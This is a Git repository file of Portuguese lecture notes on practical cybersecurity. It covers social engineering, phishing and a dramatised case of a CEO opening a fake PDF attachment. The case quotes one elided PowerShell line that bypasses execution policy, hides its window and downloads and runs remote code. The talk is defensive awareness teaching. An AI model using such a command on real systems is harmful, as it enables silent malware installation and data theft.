kasparyan/caderno-virtual
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
eb29a0d5ef
caderno-virtual/Palestras/Cybersegurança na prática.md

305 lines
5.8 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Cybersegurança na prática: onde realmente os sistemas quebram
## Parte 0: Olá
Olá, meu nome é Álvaro, conhecido pelos apelidos **Russo Incendiário**
![](../Pasted%20image%2020260222135117.png)
Gosto muito de ciência, tecnologia e pirotecnia.
# Parte 1 — Quebrando o mito
> *beep boop* — "We're in."
Essa é a imagem que a gente tem de cybersegurança.
Tela preta.
Código verde.
Um cara de hoodie digitando freneticamente.
Três telas.
Uma animação 3D do planeta Terra sendo invadido.
Isso é Hollywood.
Cybersegurança não é isso.
Hackers não “adivinham senha”.
Não é força bruta cinematográfica.
Não é mágica.
Não é genialidade sobre-humana.
É engenharia.
É entender como um sistema funciona —
melhor do que quem construiu.
---
Se você tem um cadeado que precisa ser aberto,
você não precisa da chave.
Você precisa entender como o cadeado funciona.
Como os pinos se alinham.
Como a mola responde.
Onde está a tensão.
Um chaveiro sabe abrir um cadeado
sem a chave.
Não porque ele é mágico.
Mas porque ele entende o mecanismo.
Ser hacker é isso.
---
### Exercício mental
Eu quero invadir sua casa.
Quem eu chamo?
1. Um ladrão profissional.
2. Ou o chaveiro da esquina?
O ladrão talvez quebre a porta.
Faça barulho.
Chame atenção.
O chaveiro?
Ele abre.
Sem quebrar nada.
Sem alarme.
Sem ninguém perceber.
Hackear é ser o chaveiro.
Não é destruir o sistema.
É manipulá-lo.
---
E aqui está o ponto importante:
A maioria dos sistemas não é invadida
porque alguém foi brilhante.
É invadida
porque alguém deixou um parafuso solto.
Cybersegurança não é sobre impedir o impossível.
É sobre revisar cada engrenagem
antes que alguém curioso resolva entender como ela funciona.
# Parte 2 — O Maior Vetor de Ataque Não É Técnico
> “É mais fácil convencer alguém a abrir a porta do que arrombar a porta.”
Se você quer proteger um sistema,
precisa aceitar uma coisa desconfortável:
Humanos são parte do sistema.
E humanos são previsíveis.
Coloque isso na sua cabeça:
- Usuários são superfície de ataque.
- Confiança é explorável.
- Pressa é explorável.
- Autoridade é explorável.
- Curiosidade é explorável.
- Medo é explorável.
Phishing funciona
não porque as pessoas são burras.
Mas porque ele parece legítimo.
Ele imita:
- Linguagem
- Layout
- Urgência
- Contexto
Ele explora algo que já existe:
confiança.
---
### Exercício mental
O que é mais fácil fazer para conseguir seus dados bancários?
1. Hackear a infraestrutura do Nubank?
Invadir datacenter.
Quebrar criptografia.
Burlar monitoramento.
Fugir de auditoria.
Não deixar log.
Ou...
2. Criar um site dizendo:
“Descubra qual jogador do Real Madrid você seria”
e pedir seus dados para “confirmar identidade”?
Qual dos dois exige mais engenharia?
Qual dos dois dá menos trabalho?
Qual dos dois é menos arriscado?
Silêncio estratégico aqui.
---
A maioria dos ataques não acontece
porque alguém invadiu o banco.
Acontece porque alguém clicou.
Porque alguém confiou.
Porque alguém estava com pressa.
Porque parecia normal.
---
E aqui está a parte importante para vocês como programadores:
Quando você constrói um sistema,
você não está protegendo só código.
Você está protegendo pessoas.
E pessoas:
- reutilizam senha,
- clicam sem ler,
- ignoram alerta,
- acreditam em urgência.
O atacante sabe disso.
Ele não começa pelo firewall.
Ele começa pelo comportamento.
---
Segurança não começa na criptografia.
Começa na cultura.
---
## Parte 3: Conheça seu alvo
Pergunte para qualquer estrategista como vencer uma batalha. Sua provavelmente resposta será
> "Conheça seu inimigo"
### Exemplo de caso real
## Caso real (adaptado)
Uberlândia, 14h37.
O CEO de uma empresa local está no escritório.
Reuniões pela manhã.
Planilhas abertas.
WhatsApp Web piscando.
Ar-condicionado fraco — ele comenta com alguém da equipe.
No meio disso, ele confere os e-mails.
Assunto:
"Nota Fiscal Fornecedor Atlas Comercial LTDA"
Nada estranho.
A empresa realmente tem fornecedores.
O layout do e-mail parece normal.
Assinatura, CNPJ, telefone.
Tudo plausível.
Ele abre.
Anexo:
nf-210230120310240102.zip
Ele extrai.
Dentro:
nf-210230120310240102.pdf
Ícone de PDF.
Nome de PDF.
Extensão de PDF.
Ele dá dois cliques.
Por menos de um segundo,
uma janela preta pisca na tela.
Ele nem percebe.
Acredita que o arquivo corrompeu.
Fecha.
Volta para o trabalho.
O que ele não viu:
O arquivo não era um PDF.
Era um atalho disfarçado.
Um pequeno script.
Algo equivalente a:
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest ... | Invoke-Expression"
Em português simples:
“Baixe código da internet.
Execute.
Não mostre nada.”
Em menos de 3 segundos:
- Um agente é instalado.
- A máquina estabelece conexão reversa.
- Um servidor externo agora pode enviar comandos.
- A sessão está ativa.
Não houve:
- Exploit sofisticado.
- Zero-day.
- Quebra de criptografia.
- Força bruta.
Só um clique.
Nos dias seguintes:
- Credenciais salvas no navegador são extraídas.
- Tokens de sessão são copiados.
- Acesso ao sistema interno é mapeado.
- Pastas compartilhadas são indexadas.
- E-mails são lidos.
- Dados de clientes são copiados silenciosamente.
Nada trava.
Nada quebra.
Nada avisa.
Sem ransomware.
Sem tela vermelha.
Sem pedido de resgate.
Só coleta.
Meses depois,
a empresa descobre que seus dados estão sendo usados
para aplicar golpes em seus próprios clientes.
A pergunta não é:
“Como invadiram?”
A pergunta é:
Onde estava o parafuso solto?
## Parte 4: Vulnerabilidades do Mundo Real
### Caso 1: Sistema de Controle de Acesso vazando senhas de rede.
- SQL Injection em simulador
- PostgreSQL exposto sem autenticação
- Redis aberto (pode mencionar como exemplo clássico)
Reference in New Issue View Git Blame Copy Permalink